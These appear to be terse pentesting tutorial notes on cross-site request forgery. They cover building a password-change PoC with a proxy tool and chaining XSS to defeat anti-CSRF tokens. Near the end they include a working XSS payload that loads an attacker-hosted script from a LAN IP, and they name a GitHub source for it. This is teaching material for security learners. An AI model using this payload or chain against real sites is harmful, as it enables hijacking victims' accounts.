CSRF (Cross Site Request Forgery)

1. CSRF (Cross Site Request Forgery): -
1. Victim should be logged in / active session ID.
2. Password change form example: -
1. How this attack happens: -
1. Attacker crafts his change password request from his account.
2. Sends to the victim.
3. Victim should be logged in with an active session.
4. Victim clicks the malicious link or POC sent by the attacker.
5. Victim’s browser adds/replaces victim’s session ID/cookies header automatically.
6. Password will be changed 
2. Demo: -
1. Attacker : -  capture change password request.
2. Create a CSRF poc : -
1. Right click on request.
2. Engagement tools.
3. Generate CSRF PoC.
4. Change the password ( your wish )
5. Save the POC as “.html”. Eg: - csrf.html
6. Victim should be logged in with an active session.
7. Victim will open the CSRF POC “csrf.html”.
8. Click on the submit button.
9. Password will be changed.
3. Sometime anti CSRF tokens are implemented to mitigate this attack.
1. Check the csrf token is changing or not?
2. Check x-csrf header is implemented or not?
3. Tokens cannot be bypassed if implemented properly, because fake requests cannot get tokens.
1. Still XSS + csrf attack can lead the attack. 
1. Find XSS vulnerability.
2. Start a server and serve CSRF page in this server.
1. csrf3-2-2.js  you need to serve.
2. https://github.com/appingmap/CSRF (csrf.js , is available in this link.
3. Use this as a XSS payload: -
4. <script src="http://192.168.1.128/csrf3-2-2.js"></script>
5. <script src=http://192.168.1.128/csrf3-2-2.js></script>
6. Anyone from point 1 to 2 will work. 192.168.1.128 is your server’s IP.
3. When you enter this script in XSS vulnerable parameter. It will call the script/page we served on our server.
4. “Csrf3-2-2.js” will be executed on the victim server and this page will have a csrf POC which asks csrf tokens. 
5. As this will be executed on the same tab of the browser then csrf token will be passed in the request.
6. Session IDs will be passed automatically and CSRF attack will be executed smoothly.